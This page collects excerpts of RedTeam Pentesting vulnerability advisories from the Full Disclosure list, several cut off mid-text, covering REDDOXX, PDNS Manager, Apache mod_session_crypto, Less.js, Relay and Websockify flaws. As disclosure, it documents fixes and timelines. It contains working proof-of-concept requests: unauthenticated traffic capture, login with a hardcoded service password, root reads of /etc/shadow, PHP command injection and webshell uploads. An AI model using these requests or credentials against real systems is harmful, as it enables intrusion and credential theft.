Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance RedTeam Pentesting discovered a vulnerability which allows attackers unauthenticated access to the diagnostic functions of the administrative interface of the REDDOXX appliance. The functions allow, for example, to capture network traffic on the appliance's interfaces. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Authentication Bypass Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details The administrative interface of the REDDOXX appliance [0] offers several diagnostic tools in the "Diagnostic Center". Tcpdump is one of these tools. This tool can be used to capture network traffic on local interfaces. During a penetration test, it was discovered that this function, as well as the other diagnostic functions, does not require authentication. Proof of Concept The following curl command-line can be used to start the capture process: $ curl --include --silent -H 'Content-Type: application/json' \ --data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \ http://www.example.com/api/v1/rws/diagnose/start HTTP/1.1 200 OK Date: Thu, 18 May 2017 14:58:22 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 [...] Content-Length: 0 Content-Type: application/xml The following curl command-line stops the capture process: $ curl --include --silent -H 'Content-Type: application/json' \ --data-binary '{"Name":"Tcpdump"}' \ http://www.example.com/api/v1/rws/diagnose/stop HTTP/1.1 200 OK Date: Thu, 18 May 2017 15:00:17 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 [...] Content-Length: 0 Content-Type: application/xml After the capture process is complete, the resulting capture file can be downloaded without authentication: $ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap [...] Connecting to www.example.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap] Saving to: ‘tcpdump.cap’ tcpdump.cap 100%[===>] 1.72M [...] 2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530] None of these requests contain any credentials or cookies, which could provide authentication. Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = The diagnostic functions of the REDDOXX appliance can be used without authentication. This allows attackers to, for example, capture network traffic. During a penetration test it was possible to capture multiple emails and also POP3 login attempts with cleartext credentials. This is rated as a high risk. Timeline 2017-05-17 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-07-20 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in se
[FD] [RT-SA-2017-007] Undocumented Administrative Service Account in REDDOXX Appliance
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance RedTeam Pentesting discovered an undocumented service account in the REDDOXX appliance software, which allows attackers to access the administrative interface of the appliance and change its configuration. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Hidden Service Account Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-007 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details Through the ISO provided on the vendor's homepage [1], it was possible to analyze the files in a typical REDDOXX appliance [0] installation. As part of this process, hardcoded credentials for a service account were found in a .NET binary file. With these credentials, it was possible to authenticate against the administrative interface. Proof of Concept The following curl command-line shows an unsuccessful login attempt with invalid credentials against the administrative interface: $ curl --silent -H 'Content-Type: application/json' --data '{"UserName": "redteam@local", "Password":"redteam"}' http://www.example.com/api/v1/proxy/auth/credentials | jq . { "ResponseStatus": { "ErrorCode": "Unauthorized", "Message": "Invalid UserName or Password", "Errors": [] } } When the credentials extracted from the binaries are provided however, the webserver returns a session ID instead of an error message, indicating a successful login: $ curl --silent -H 'Content-Type: application/json' --data '{"UserName": "rdx-build-in-service-user@local", "Password":"rdx!1ntern4l"}' http://www.example.com/api/v1/proxy/auth/credentials | jq . { "SessionId": "Qm5odfSFB2tVh8De6HjD", "UserName": "rdx-build-in-service-user@local", "DisplayName": "", "ResponseStatus": {} } Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = The hidden service account allows attackers to authenticate to the administrative interface of the appliance. With this level of access, the appliance can be completely reconfigured. For example, core functionalities, such as spam filtering or archiving, can be disabled. RedTeam Pentesting assumes that the hidden service account is present on all REDDOXX installations and rates its presence as a high risk. Timeline 2017-05-17 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-06-21 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in
[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance
XX}",'\ '"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \ 'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName' "chatscripts" "gtk-2.0" "xen" "dbus-1" "request-key.d" "smartmontools" "console" "skel" "xml" "initramfs-tools" "sysctl.d" "pear" "sudoers.d" "cron.monthly" "rc5.d" "init" "byobu" "pki" "xpdf" "cron.weekly" "snmp" "ld.so.conf.d" [...] Since the process handling the requests runs with root privileges, it was also possible to read the contents of the file "/etc/passwd": $ curl --silent --data-binary '{"id":"{----}",'\ '"method":"FileTransfer.DownloadFile","params":{"FileName": "/etc/shadow",'\ '"Sequence": 1,"ChunkSize": 1}}' 'http://www.example.com/RdxEngine/json' \ | jq -r .result.ChunkData | tr -d '\r\n' | base64 -d root:$6$$YYY[...]:14993:0:9:7::: daemon:*:16652:0:9:7::: bin:*:16652:0:9:7::: sys:*:16652:0:9:7::: sync:*:16652:0:9:7::: games:*:16652:0:9:7::: man:*:16652:0:9:7::: lp:*:16652:0:9:7::: mail:*:16652:0:9:7::: news:*:16652:0:9:7::: uucp:*:16652:0:9:7::: proxy:*:16652:0:9:7::: www-data:*:16652:0:9:7::: backup:*:16652:0:9:7::: list:*:16652:0:9:7::: irc:*:16652:0:9:7::: gnats:*:16652:0:9:7::: nobody:*:16652:0:9:7::: libuuid:!:16652:0:9:7::: syslog:*:16652:0:9:7::: messagebus:*:16899:0:9:7::: sshd:*:16899:0:9:7::: vboxadd:!:16899:: statd:*:16899:0:9:7::: admin:$1$$ZZ:14054:0:9:7::: clamav:!:16899:0:9:7::: ntp:*:16899:0:9:7::: hacluster:!:16899:0:9:7::: firebird:*:16899:0:9:7::: redis:!:16899:0:9:7::: snmp:*:16899:0:9:7::: bind:*:16899:0:9:7::: smbadmin:!:17037:0:9:7::: smbuser:!:17037:0:9:7::: Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = Attackers with access to a REDDOXX appliance are able to retrieve directory listings and content of arbitrary files. Although this vulnerability requires attackers to submit a valid session ID, the vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3] show how this requirement can be fulfilled even by attackers without valid credentials. Additionally, the RdxEngine process handling the requests to the vulnerable methods runs with root privileges, allowing attackers to read any file on the filesystem and, for example, extract the local user hashes for offline brute-force attacks. This vulnerability is therefore rated as a high risk. Timeline 2017-05-17 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-07-20 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) [2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004 [3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpBH4vRevbt9.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-005] Unauthenticated Extraction of Session-IDs in REDDOXX Appliance
nType": "Console", "IPAddress": "127.0.0.1", "Details": "rdx-build-in-service-user@local" }, { "Id": "{----}", "SessionType": "WebService", "IPAddress": "", "Details": "rdx-build-in-service-user@local Last access: 22-5-17 10:26:17" }, { "Id": "{----}", "SessionType": "WebService", "IPAddress": "", "Details": "Info@[...] Last access: 22-5-17 09:53:21" }, { "Id": "{----}", "SessionType": "WebService", "IPAddress": "", "Details": "Administrator@[...] Last access: 22-5-17 10:09:30" }, { "Id": "{----}", "SessionType": "WebService", "IPAddress": "", "Details": "rdx-build-in-service-user@local Last access: 22-5-17 10:11:19" }, { "Id": "{----}", "SessionType": "WebService", "IPAddress": "", "Details": "rdx-build-in-service-user@local Last access: 22-5-17 13:13:19" } ] } The tool jq [2] is used to format the JSON output returned by the appliance's API. Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = The risk of this vulnerability is estimated to be high. The extracted session IDs can be used by attackers to impersonate the user associated with the ID when interacting with the appliance. An authenticated session is also a precondition to exploit the vulnerability described in rt-sa-2017-006 [3], which allows arbitrary file disclosure as root. Timeline 2017-05-16 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-06-21 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) [2] https://stedolan.github.io/jq/ [3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-006 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpSEgZx0kjFC.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance
/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin vboxadd:x:999:1::/var/run/vboxadd:/bin/false statd:x:104:65534::/var/lib/nfs:/bin/false admin:x:0:0:admin,,,:/home/admin:/opt/reddoxx/local/scripts/admin.sh clamav:x:105:111::/var/lib/clamav:/bin/false ntp:x:106:112::/home/ntp:/bin/false hacluster:x:107:113:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false firebird:x:108:114:Firebird Database Administator,,,:/var/lib/firebird:/bin/bash redis:x:109:115:redis server,,,:/var/lib/redis:/bin/false snmp:x:110:116::/var/lib/snmp:/bin/false bind:x:111:117::/var/cache/bind:/bin/false smbadmin:x:1001:1001::/home/smbadmin:/bin/false smbuser:x:1002:1002::/home/smbuser:/bin/false Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = This vulnerability can be used by attackers to download arbitrary files if the filename and path is known from filesystems reachable on the appliance. Depending on the configuration of the appliance, attackers can read the credentials stored in the configuration files or extract session IDs from log files. There are also no authentication checks in place. Therefore, the vulnerability poses a high risk. Timeline 2017-05-16 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-06-21 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) [2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-003 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ===== RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpPQzktKAO7w.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance
a system under the attacker's control. The vulnerability is therefore rated as a high risk. Timeline 2017-05-16 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-06-21 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) [2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ===== RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpCbdm6So3Ns.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-011] Remote Command Execution in PDNS Manager
.chr(100)])", "userName":"administrator", "userPassword":"password", "type":"mysql" } To bypass the problem that the addslashes() function prevents the usage of single or double quotes for the GET variable name, it was instead encoded with the chr() function and decodes to the string "cmd". PDNS Manager since Git commit 3bf4e28[1] from 12 December 2016 uses the PHP PDO class for establishing a database connection. Since the PDO class is quite liberal in what it accepts in its Data Source Name parameter, the configuration parameters as shown above are accepted and allow for a valid database connection, as the additional data in the "port" parameter is ignored by the PDO class. Finally, the file config/config-user.php will be written with the following content: http://example.com/config/config-user.php?cmd=uname%20-a Proof of Concept 1. Check if install.php is still available and can be used to write a new configuration by visiting the following URL: http://example.com/install.php 2. Set up a database that PDNS Manager can connect to. 3. Send an HTTP POST request with a manipulated "port" parameter, e.g. curl -H 'Content-Type: application/json' --data \ '{"host":"attacker-system.example.com", \ "user":"root", \ "password":"secret", \ "database":"pdnsdb", \ "port":"3306;system($_GET[chr(99).chr(109).chr(100)])", \ "userName":"administrator", \ "userPassword":"password", \ "type":"mysql"}' \ http://example.com/api/install.php 4. Run arbitrary commands: http://example.com/config/config-user.php?cmd=uname%20-a Workaround == Ensure that config/config-user.php exists. Fix === The problem was fixed in the Git master branch in commit ccc4232[2]. Alternatively, the stable version v1.2.1 and earlier are not affected. Security Risk = The vulnerability is deemed to be of medium risk. The number of installations that are configured in the way described should be rather low, as it is not the recommended way of installing PDNS Manager and the development version of PDNS Manager needs to have been used. However, if such a configuration is found, arbitrary PHP code can be run on the system. Depending on the system's configuration, this can lead to a full compromise of the host running PDNS Manager. Timeline 2017-05-16 Vulnerability identified 2017-06-16 Customer approved disclosure to vendor 2017-06-27 Vendor notified 2017-06-29 Vendor released fixed version 2017-07-05 Advisory released References == [0] https://pdnsmanager.lmitsystems.de/ [1] https://github.com/loewexy/pdnsmanager/commit/3bf4e2874a0120d99ae02a1a9f4a6e74094c7dc1 [2] https://github.com/loewexy/pdnsmanager/commit/ccc423291cb0e6f8c58849f71821e7425b7c030e RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpmXlCKIC23e.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto
sion: b'username=guest×tamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r' real6m43.088s user0m15.464s sys 0m0.976s In this sample application, the username and a timestamp are included in the session data. The Python script can also be used to encrypt a new session containing the username "admin": $ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\ Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\ RU= username=admin Encrypted session: sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY real3m38.002s users0m8.536s sys0m0.512s Sending this newly encrypted session to the server shows that the username is now "admin": $ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\ zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb your username is admin Workaround == Use a different means to store the session, e.g. in a database by using mod_session_dbd. Fix === Update to Apache HTTP version 2.4.25 (see [2]). Security Risk = Applications which use mod_session_crypto usually store sensitive values in the session and rely on an attacker's inability to decrypt or modify the session. Successful exploitation of the Padding Oracle vulnerability subverts this mechanism and allows to construct sessions with arbitrary attacker-specified content. Depending on the application this may completely subvert the application's security. Therefore, this vulnerability poses a high risk. Timeline 2016-01-11 Vulnerability identified 2016-01-12 Customer approved disclosure to vendor 2016-01-12 CVE number requested 2016-01-20 Vendor notified 2016-01-22 Vendor confirmed the vulnerability 2016-02-03 Vendor provided patch 2016-02-04 Apache Security Team assigned CVE number 2016-03-03 Requested status update from vendor, no response 2016-05-02 Requested status update from vendor, no response 2016-07-14 Requested status update and roadmap from vendor 2016-07-21 Vendor confirms working on a new released and inquired whether the patch fixes the vulnerability 2016-07-22 RedTeam confirms 2016-08-24 Requested status update from vendor 2016-08-29 Vendor states that there is no concrete timeline 2016-12-05 Vendor announces a release 2016-12-20 Vendor released fixed version 2016-12-23 Advisory released References == [1] https://github.com/mwielgoszewski/python-paddingoracle [2] http://httpd.apache.org/security/vulnerabilities_24.html RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgp5GLD783dxl.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2016-003] Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler
alicious LESS file to the Less compiler. This vulnerability can be exploited in various scenarios: If an application takes user-input and feeds it to the Less compiler, an attacker can gain code execution and compromise the system running the Less compiler. If a user downloads and compiles a malicious LESS file, an attacker can compromise the user's system. RedTeam Pentesting discovered and exploited this vulnerability in a penetration test. However, it became increasingly clear after consultation with the LESS development team that the encountered situation is likely relatively rare. The reason for that is that LESS files are usually compiled on the server-side once and most often do not contain user-supplied content. In cases where LESS files do contain or consist of user-supplied content, the browser-based implementation [3] of the Less compiler is the typical choice. Still, the official Less documentation does not mention the compiler's feature to evaluate inline JavaScript and the consequential risks. Thus, users are likely to be unaware that embedding user-controlled content into a LESS file may result in arbitrary code execution. Therefore, RedTeam Pentesting decided to release this advisory, to bring the users' attention to this important fact. Timeline 2016-03-18 Vulnerability identified 2016-05-03 Advisory provided to customer 2016-05-31 Customer approved disclosure to vendor 2016-06-24 Advisory sent to vendor 2016-07-05 Vendor debates whether it is a security issue or a documentation issue 2016-07-12 Vendor opts for waiting until release 3.0, which disables the option to compile JavaScript by default 2016-07-14 RedTeam downrates the vulnerability from high risk to low to acknowledge that it is more of a setup issue 2016-11-24 Still no release 3.0, advisory released References == [0] https://github.com/less/less.js [1] http://web.archive.org/web/20140202171923/http://www.lesscss.org/ [2] http://www.bennadel.com/blog/2638-executing-javascript-in-the-less-css-precompiler.htm [3] http://lesscss.org/#client-side-usage RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpj1HSRn6sBL.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution
hp Requesting this file with the URL http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield the server's output of the phpinfo() function. However, since the entire content of the upload request is saved to a temporary file, a regular POST request containing only the code to be executed is sufficient to exploit this vulnerability. The following invocation of curl uploads the same PHP script which invokes the function 'phpinfo()': $ curl --silent --include --data '' \ 'http://example.com/relay-1-5-3/upload.pl?redteam.php' In the server's upload directory, the file temp_redteam.php contains the data that was sent to the upload.pl script: $ ls relay-1-5-3/uploads/ stats_redteam.php.txt temp_redteam.php $ cat temp_redteam.php Requesting this file with the URL http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield the server's output of the phpinfo() function. Using either of these methods, an attacker is able to upload arbitrary files to the affected web server e.g. in order to easily execute PHP commands with the privileges of the web server. Workaround == One possible workaround would be to prevent the execution of files in the upload directory and deliver them as attachments instead. Fix === None. Security Risk = This vulnerability allows unauthenticated attackers to upload arbitrary files to the affected system. In the web server's and project's default configuration it is very likely that this may be used to execute arbitrary commands with the privileges of the web server process. This is possible without authentication, thereby providing no barrier for attackers. It is therefore rated as a high risk. Since this software is quite old and not well maintained, it is likely that additional vulnerabilities exist. However, this was not further evaluated. Timeline 2015-11-19 Vulnerability discovered 2016-04-07 Customer approved disclosure of vulnerability 2016-05-12 Developers contacted, project is no longer maintained 2016-05-31 Advisory published References == [1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager [2] https://code.google.com/p/relay/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpob3TUU2oVL.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow
Advisory: Websockify: Remote Code Execution via Buffer Overflow RedTeam Pentesting discovered a buffer overflow vulnerability in the C implementation of Websockify, which allows attackers to execute arbitrary code. Details === Product: Websockify C implementation Affected Versions: all versions <= 0.8.0 Fixed Versions: versions since commit 192ec6f (2016-04-22) [0] Vulnerability Type: Buffer Overflow Security Risk: high Vendor URL: https://github.com/kanaka/websockify Vendor Status: fixed Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "websockify was formerly named wsproxy and was part of the noVNC project. At the most basic level, websockify just translates WebSockets traffic to normal TCP socket traffic. Websockify accepts the WebSockets handshake, parses it, and then begins forwarding traffic between the client and the target in both directions." (from the project's readme) More Details For each new connection, websockify forks and calls the function do_handshake() to receive a client's WebSocket handshake. The following excerpt shows some of the source code responsible for receiving the client's data from the socket file descriptor: ws_ctx_t *do_handshake(int sock) { char handshake[4096], response[4096], sha1[29], trailer[17]; [...] offset = 0; for (i = 0; i < 10; i++) { len = ws_recv(ws_ctx, handshake+offset, 4096); if (len == 0) { handler_emsg("Client closed during handshake\n"); return NULL; } offset += len; handshake[offset] = 0; if (strstr(handshake, "\r\n\r\n")) { break; } usleep(10); } [...] As can be seen in the listing, the function ws_recv() is called in a loop to read data from the client's socket into the stack-allocated buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096 bytes are read from the socket and stored in the handshake buffer. The variable 'offset' determines the position in the buffer at which the received data is written. In each iteration, the value of 'offset' is increased by the amount of bytes received. If the received data contains the string "\r\n\r\n", which marks the end of the WebSocket 